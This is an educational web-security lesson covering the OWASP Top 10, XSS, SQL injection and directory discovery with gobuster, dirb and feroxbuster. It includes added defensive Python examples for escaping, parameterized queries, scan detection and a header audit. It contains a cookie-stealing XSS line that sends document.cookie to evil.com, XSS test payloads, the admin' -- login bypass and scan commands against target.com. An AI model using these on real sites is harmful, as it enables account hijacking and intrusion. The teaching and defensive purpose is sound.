Final Lesson: Web Security!

This lesson ties the whole course together. You will learn how to recognize website vulnerabilities: XSS, SQL Injection, and Directory Discovery, the most common ways attackers get in.

📌 You will learn: the OWASP Top 10, XSS (Cross-Site Scripting), an introduction to SQL Injection, directory discovery (Gobuster/Dirb), and how to secure a website.

⚖️ Important Notice: Use this knowledge legitimately, on your own systems or on practice labs (DVWA, HackTheBox, TryHackMe). For anything involving other people's websites, you need permission.

1. OWASP Top 10: The Most Common Vulnerabilities

OWASP (Open Web Application Security Project) is a non-profit organization that publishes a list of the most common web application vulnerabilities. The 2021 list:

  1. A01: Broken Access Control: users can reach areas they are not authorized for
  2. A02: Cryptographic Failures: data encrypted incorrectly or not encrypted at all
  3. A03: Injection (SQL, NoSQL, etc.): user input ends up controlling the system
  4. A04: Insecure Design: the system's design itself is flawed
  5. A05: Security Misconfiguration: the system is configured incorrectly
  6. A06: Vulnerable Components: outdated libraries / frameworks with known vulnerabilities
  7. A07: Auth Failures: login and authentication implemented incorrectly
  8. A08: Software & Data Integrity: can updates and dependencies be verified?
  9. A09: Logging Failures: logs not kept or monitored properly
  10. A10: Server-Side Request Forgery (SSRF): the server is tricked into making requests for the attacker

2. XSS: Cross-Site Scripting

XSS is the most common website vulnerability. It happens when a website allows malicious code (JavaScript) to be injected into a page and executed in the user's browser.

Types of XSS

# 1. Reflected XSS: the code is reflected back in the response when you search
# URL: http://vulnerable.com/search?q=<script>alert('XSS')</script>
# If the website prints the parameter directly into the page, the script runs

# 2. Stored XSS: the code is saved in the database
# Example: a comment field containing:
# <script>document.location='http://evil.com/steal?cookie='+document.cookie</script>
# Now every user who views the comment has their cookie sent away

# 3. DOM-based XSS: the page's own JavaScript writes untrusted data into the DOM

How to Verify XSS

# Test the website's input fields
# Enter:
<script>alert('XSS Test')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# If that executes, the website is vulnerable to XSS

How to Prevent XSS

# 1. HTML Encoding: replace special characters
# < → &lt;   > → &gt;   " → &quot;

# 2. Content Security Policy (CSP) header
Content-Security-Policy: default-src 'self'; script-src 'self'

# 3. HttpOnly cookie: stops JavaScript from reading the cookie (limits cookie theft; it does not stop the script itself)
Set-Cookie: session=abc123; HttpOnly; Secure

# 4. Use a framework (React, Angular): they escape output by default
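The reflected search page from this section rendered with and without HTML encoding, plus the CSP and HttpOnly headers above, as an added example that is not part of the lesson. The payload is the lesson's test string; the page markup and the helper names are constructed.

```python
# Added example (not from the lesson): the lesson's search-page XSS rendered
# two ways, so the effect of HTML encoding is visible. The payload is the
# lesson's test string; the page markup and helper names are constructed.
import html
import re

PAYLOAD = "<script>alert('XSS Test')</script>"


def render_unsafe(query: str) -> str:
    """Reflected XSS: the query is pasted straight into the page markup."""
    return f"<p>Results for: {query}</p>"


def render_safe(query: str) -> str:
    """Hardened: special characters become entities (&lt; &gt; &quot; ...),
    so the browser displays the text instead of executing it."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def contains_live_script(page: str) -> bool:
    """Crude detector: a raw <script> tag or an inline on* event handler."""
    return re.search(r"<script\b|<\w+[^>]*\son\w+\s*=", page, re.I) is not None


def hardened_headers(session_id: str) -> dict:
    """Defence in depth from the lesson: CSP blocks inline scripts even if
    escaping is forgotten somewhere, and HttpOnly keeps the session cookie
    out of reach of document.cookie."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure",
    }


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))  # the <script> tag survives untouched
    print(render_safe(PAYLOAD))    # &lt;script&gt;...: harmless text
```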

3. SQL Injection: Introduction

SQL Injection happens when user input is inserted directly into an SQL query without being sanitized. This lets an attacker manipulate the query.

SQL Injection Example

# The website's vulnerable code (Python / PHP)
# query = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"

# If the user enters:
# Username: admin' --
# Password: anything

# The query becomes:
# SELECT * FROM users WHERE username='admin' -- ' AND password='anything'
# Because -- starts a comment in SQL, the password check is thrown away!

# The attacker logs in without knowing the password

How to Prevent SQL Injection

# 1. Parameterized Queries (most important)
# Python (sqlite3):
cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password))

# PHP (PDO):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username=:username");
$stmt->execute(['username' => $username]);

# 2. Input Validation
# Restrict the type and length

# 3. Use an ORM
# SQLAlchemy, Django ORM, etc.: they parameterize queries automatically
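The vulnerable login query from this section beside its parameterized version, run against a constructed in-memory SQLite database, as an added example that is not part of the lesson. The table, the account and the `login_*` helper names are assumptions.

```python
# Added example (not from the lesson): the lesson's vulnerable login query
# beside its parameterized version, run against a constructed in-memory
# SQLite database so the bypass can be observed without a live target.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account with a plaintext password
    (mirroring the lesson's query; real apps store a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String concatenation: the input becomes SQL text. With the username
    admin' --  the password condition is commented out of the WHERE clause."""
    query = ("SELECT * FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterized query: values travel separately from the SQL, so a
    quote or -- in the input is just data, never syntax."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run both logins with the lesson's payload and with a real credential."""
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "admin' --", "anything"),
        "safe_bypassed": login_safe(conn, "admin' --", "anything"),
        "safe_real_login": login_safe(conn, "admin", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())  # {'vulnerable_bypassed': True, 'safe_bypassed': False, 'safe_real_login': True}
```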

4. Directory Discovery: Finding Hidden Locations

Directory Discovery is a technique for finding hidden directories and files on a website that are not openly linked. Pen testers regularly find admin pages, backup files, and config files this way.

Gobuster: The Fastest Tool

# Install
sudo apt install gobuster

# Basic directory discovery
gobuster dir -u http://localhost -w /usr/share/wordlists/dirb/common.txt

# More options
gobuster dir \
  -u http://target.com \
  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,txt,bak \
  -t 50 \
  -o natiijo.txt

# Flag explanation:
# -u  = target URL
# -w  = wordlist (the list of names to try)
# -x  = file types (extensions) to look for
# -t  = threads (speed)
# -o  = save the results to a file

Dirb: The Simple Alternative

# Dirb: simple, but it works
dirb http://localhost
dirb http://localhost /usr/share/dirb/wordlists/common.txt

Feroxbuster: Recursive Scan

# Feroxbuster can also descend into the subdirectories it finds
feroxbuster --url http://localhost --wordlist /usr/share/wordlists/dirb/common.txt
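The defender's side of the scans above: detection logic run over web server access logs to spot a directory discovery run, as an added example that is not part of the lesson. The log lines (common log format, IP addresses, User-Agent strings) are constructed, and the miss threshold is an assumption to tune per site.

```python
# Added example (not from the lesson): detection logic a defender can run over
# web server access logs to spot directory discovery scans like the ones above.
# The log lines, IPs and User-Agents are constructed; the threshold is assumed.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /config.php HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /.git/HEAD HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /uploads HTTP/1.1" 403 199 "-" "gobuster/3.6"
198.51.100.4 - - [10/Oct/2023:13:55:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:55:41 +0000] "GET /about HTTP/1.1" 200 872 "-" "Mozilla/5.0"
"""


def parse(log_text: str):
    """Yield one dict per well-formed log line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_scanners(log_text: str, min_misses: int = 4) -> dict:
    """Per client IP, count 404/403 responses and distinct paths probed.
    Flag an IP with at least `min_misses` misses (assumed threshold) or a
    User-Agent that names a known discovery tool."""
    misses = defaultdict(int)
    paths = defaultdict(set)
    agents = defaultdict(set)
    for rec in parse(log_text):
        ip = rec["ip"]
        paths[ip].add(rec["path"])
        agents[ip].add(rec["agent"] or "")
        if rec["status"] in ("404", "403"):
            misses[ip] += 1
    flagged = {}
    for ip in paths:
        scanner_ua = any(re.search(r"gobuster|dirb|feroxbuster", a, re.I) for a in agents[ip])
        if misses[ip] >= min_misses or scanner_ua:
            flagged[ip] = {"misses": misses[ip], "paths": len(paths[ip]), "scanner_ua": scanner_ua}
    return flagged
```

A real scanner can set any User-Agent, so the miss count per IP within a short window is the signal to rely on; the UA match is only a cheap confirmation.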

5. Practice Labs

Test your knowledge using legitimate labs:

Free: Online

  • 🟢 TryHackMe (tryhackme.com): beginner-friendly, with free rooms available
  • 🔵 HackTheBox (hackthebox.com): advanced, but full of opportunities
  • 🟡 PortSwigger Web Security Academy: free and dedicated to web security
  • 🟠 PicoCTF: for beginners

Local (VMs)

  • 💻 DVWA (Damn Vulnerable Web Application): a deliberately vulnerable website built for learning
  • 💻 VulnHub: free VMs you can practice on
  • 💻 Metasploitable: a vulnerable Linux VM for practicing with Metasploit

# Run DVWA with Docker
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# Open in your browser: http://localhost
# Username: admin
# Password: password

6. Web Security Checklist: Check Your Own Website

# Basic configuration (HTTP headers)
curl -I https://example.com

# Check the important headers:
# X-Frame-Options: DENY / SAMEORIGIN    (clickjacking protection)
# X-XSS-Protection: 1; mode=block      (XSS filter)
# Content-Security-Policy              (CSP)
# Strict-Transport-Security            (HSTS)
# X-Content-Type-Options: nosniff      (MIME sniffing protection)

# Free online tools:
# securityheaders.com     - header check
# ssllabs.com/ssltest     - SSL/TLS check
# observatory.mozilla.org - security check
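A checker for the header checklist above, run over constructed `curl -I` output so it needs no network, as an added example that is not part of the lesson. The header names and expected values are the lesson's; the parsing logic, the sample response and the HttpOnly cookie check (from section 2) are mine.

```python
# Added example (not from the lesson): a checker for the headers listed above,
# run over constructed `curl -I` output. Header names are the lesson's.

SAMPLE_CURL_OUTPUT = """\
HTTP/2 200
content-type: text/html; charset=utf-8
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
set-cookie: session=abc123; Secure
"""

# Checklist header -> predicate on its value (None means any value counts as present)
CHECKS = {
    "X-Frame-Options": lambda v: v.upper() in ("DENY", "SAMEORIGIN"),
    "Content-Security-Policy": None,
    "Strict-Transport-Security": lambda v: "max-age=" in v.lower(),
    "X-Content-Type-Options": lambda v: v.lower() == "nosniff",
    "X-XSS-Protection": None,  # legacy browser filter; modern browsers ignore it
}


def parse_headers(raw: str) -> dict:
    """Map lower-cased header name -> list of values (Set-Cookie may repeat)."""
    headers = {}
    for line in raw.splitlines()[1:]:  # first line is the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def audit(raw: str) -> dict:
    """Return {item: 'ok' | 'missing' | 'weak'} for each checklist header,
    plus whether every cookie carries HttpOnly (see section 2)."""
    headers = parse_headers(raw)
    report = {}
    for name, check in CHECKS.items():
        values = headers.get(name.lower())
        if not values:
            report[name] = "missing"
        else:
            report[name] = "ok" if check is None or check(values[0]) else "weak"
    cookies = headers.get("set-cookie", [])
    if not cookies:
        report["Set-Cookie HttpOnly"] = "missing"
    else:
        ok = all("httponly" in c.lower() for c in cookies)
        report["Set-Cookie HttpOnly"] = "ok" if ok else "weak"
    return report
```

Paste the real output of `curl -I` into `audit()` to get the same report for your own site.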

🎓 The Complete Cybersecurity Course Is Finished!

You have learned: Ethical Hacking, Networking, Linux, OSINT, Nmap, and Web Security. You now have a solid foundation in cybersecurity. Keep going, keep practicing, and look for a job or a bug bounty!


🚀 Next Step: Start on TryHackMe or HackTheBox, take the eJPT or CompTIA Security+ exam, and look for a cybersecurity job. Fadal Store is releasing more lessons, so watch for their news!